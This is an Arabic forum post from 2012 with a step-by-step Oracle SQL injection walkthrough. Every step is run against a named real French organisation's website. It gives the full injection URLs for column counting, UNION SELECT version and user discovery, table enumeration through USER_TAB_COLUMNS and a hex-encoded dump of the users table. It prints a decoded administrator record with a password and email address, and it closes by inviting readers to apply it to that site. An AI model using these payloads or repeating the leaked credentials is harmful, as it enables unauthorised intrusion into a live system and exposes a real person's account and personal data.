الموضوع: Oracle SQL Injection
عرض مشاركة واحدة
قديم 07-22-2012, 02:00 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
ABO-SAGER
 
الصورة الرمزية ABO-SAGER
 

 

 
إحصائية العضو





ABO-SAGER غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ABO-SAGER is on a distinguished road

افتراضي Oracle SQL Injection



السلام عليكم ورحمه الله وبركاته

الحمد لله رب العالمين والصلاه والسلام على نبي المرسلين محمد الصادق الامين


سوف اطرح لكم لمحه بسيطه عن Oracle Injection ,, الاوامر مثل sql Injection يوجد اختلاف بسيط .. واكيد الشرح مارارح يكون مثل شروحات بلاك روز وتكل فقط لمحه كتابيه بسيطه


\

http://www.cfpb.fr/cfpb_reseau_france.php?id=1


نستخرج الاعمده بالطريقه العاديه order by

www.cfpb.fr/cfpb_reseau_france.php?id=1'+order+by+14-- -

عدد العواميد 14 تعلمنا في sql Injection استخدام الامر التالي

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

في الاوراكل بدل كتابه العواميد نخليها قيمه خاليه .. null
اذن الامر سيكون بهذا الشكل


union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,nul

نستخدم الامر التالي في معرفه العمود المصاب

http://www.cfpb.fr/cfpb_reseau_france.php?id=1'+and+1=2+union+select+ banner,null,null,null,null,null,null,null,null,nul l,null,null,null,null+from+v$version--+

نشرح الامر
+from+v$version امر استخراج اصدار القاعده طيب ماعرفنا العمود المصاب نمرر كلمه banner على كل الاعمدة وهي عبارة بصمه للاستعلام عن العمود المصاب واذا كان صحيح يظهر لك اصدار القاعده
CORE 10.2.0.4.0 Production

عرفنا العمود المصاب نستخرج اسم اليوزر واسم القاعده بالامر

http://www.cfpb.fr/cfpb_reseau_france.php?id=1'+and+1=2+union+select+ user,null,null,null,null,null,null,null,null,null, null,null,null,null+from+dual--+

في العمود رقم 1 نحط user ثم SYS.DATABASE_NAME
عاد dual ماعرفت ايش فايدتها اعتقد انهاء الامر ,, الله اعلم

اسم اليوزر : MEDIAC

اسم القاعده : PORTAILN

امر استخراج الجداول مع الحقول


http://www.cfpb.fr/cfpb_reseau_france.php?id=1'+and+1=2+union+select+ rawtohex(table_name||chr(58)||column_name),null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null+from+USER_TAB_COLUMNS--+


rawtohex(table_name||chr(58)||column_name)
rawtohex بدل الامر concat
||chr(58)|| = :
USER_TAB_COLUMNS بدل information_schema


راح يستخرج لنا الجداول والحقول مشفره ب hex نفك التشفير بتحويل الهيكس الى قيمه نصيه string
موقع لفك التشفير :


http://www.string-functions.com/hex-string.aspx


نفك تشفير جميع الجداول حتى نحصل على مانريدة ..
بعد فك التشفير وجدنا الجدول الذي يحتوي على حقل اليوزر والباسورد


UTILISATEURS:ID
UTILISATEURS
:NOM
UTILISATEURS
:PASSWORD
UTILISATEURS
:EMAIL

الان بقي لنا امر واحد وهو استخراج بيانات الادمن بالامر التالي

http://www.cfpb.fr/cfpb_reseau_france.php?id=1%27+and+1=2+union+selec t+rawtohex(ID||chr(58)||NOM||chr(58)||PASSWORD||ch r(58)||EMAIL),null,null,null,null,null,null,null,n ull,null,null,null,null,null+from+UTILISATEURS--+

الامر واضح مايحتاج شرح في العمود المصاب طلبنا منه استخراج البيانات المخزنه في الحقول
وفي نهايه الرابط from + جدول الادمن وهو UTILISATEURS .. راح تظهر لنا البيانات مشفره hex مثل ما قلنا نفك تشفيرها .. بتحويلها الى قيم نصيه string

بيانات الادمن مشفره

313A447572616E643A6774726672746F763A66726564657269 632E647572616E6440636670622E6672

بعد فك التشفير

1:Durand:gtrfrtov:frederic.durand@cfpb.fr

ان شاء الله تكون الفكرة وضحت ,, عشان تفهم طبق على الموقع










Oracle SQL Injection

التوقيع

ABO-SAGER

 

   

رد مع اقتباس